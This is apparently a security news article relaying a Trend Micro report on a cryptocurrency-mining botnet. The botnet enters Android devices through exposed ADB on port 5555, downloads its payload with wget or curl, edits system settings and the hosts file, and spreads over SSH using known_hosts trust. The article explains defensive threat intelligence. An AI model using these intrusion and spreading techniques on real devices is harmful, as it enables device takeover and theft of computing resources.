A new cryptocurrency mining botnet has been discovered that uses the Android Debug Bridge (ADB) Wi-Fi interface and SSH connections to hosts to infect other devices. The botnet malware has spread to 21 countries with the highest rates of infection observed in South Korea, revealed a report from Trend Micro.
While the ADB is disabled on most Android devices by default, some ship with this function enabled thus allowing unauthenticated attackers to connect remotely via the 5555 TCP port and gain direct access via the ADB command shell which is commonly used by developers to install and debug apps.
During the first stage of the attack the IP address 45[.]67[.]14[.]179 connects to a device running ADB and uses the ADB command shell to change the attacked system’s working directory to “/data/local/tmp”. This modification is based on the fact that .tmp files typically have default execution permissions.
The bot then performs a series of scans to determine if it landed on a honeypot and what kind of operating system is running on the targeted device. Next, the malicious implant uses wget to download the payload, and curl if wget is not present in the infected system. The bot then executes the command “chmod 777 a.sh” to change the permission settings of downloaded payload and executes a series of commands to remove its traces.
Once downloaded the payload allows the botnet to chose one of the three miners depending on infected system’s manufacturer, architecture, processor type, and hardware. All three miners are delivered by the same URL.
“To optimize the mining activity, the script also enhances the victim’s memory by enabling HugePages, which will help the system support memory pages that are greater than its default size. This ability can be seen in the script as “/sbin/sysctl -w vm.nr_hugepages=128,” note the researchers.
Additionally, the bot targets rival cryptocurrency miners if they are found on the victim’s device. It blocks its competitor by modifying /etc/hosts and adding the additional record “0.0.0.0 miningv2.duckdns.org”, which blocks the URL of the competing miner.
One of the interesting aspects of this botnet is the use of a spreading mechanism via SSH which enables it to infect systems listed in the known_hosts file of compromised devices.
“Being a known device means the system can communicate with the other system without any further authentication after the initial key exchange, i.e., each system considers the other as safe. The combination of known hosts and the victim’s public key makes it possible for the malware to connect to smart devices or systems that have previously connected to the infected system,” explains Trend Micro.
Once connected via SSH to another target, the malware uses two spreader scripts to download, install, and launch a miner payload.